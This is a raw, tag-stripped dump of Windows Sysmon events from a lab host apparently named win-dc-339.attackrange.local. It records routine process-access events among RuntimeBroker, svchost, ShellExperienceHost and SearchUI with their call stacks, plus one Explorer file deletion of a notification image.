 10341000x800000000000000079585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000079584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000079582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.482{A7A01FEF-C0A6-607E-7705-00000000BB01}43486892C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+dbd49|C:\Windows\System32\Windows.Storage.dll+dbb75|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000079578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.466{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.466{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.466{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.466{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.466{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.466{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\ActionCenterCache\microsoft-explorer-notification--d1f6275c-b9a0-a25e-7f73-51b54487be4c-_7_0.pngMD5=00E5FCFD833151F7CBDE607E2F7AFEB4,SHA256=B80192AAABE007BAECD0603E3CE183E9D554B8A6B0411D20716ACFA086AE3035,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000079568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000079567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000079566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 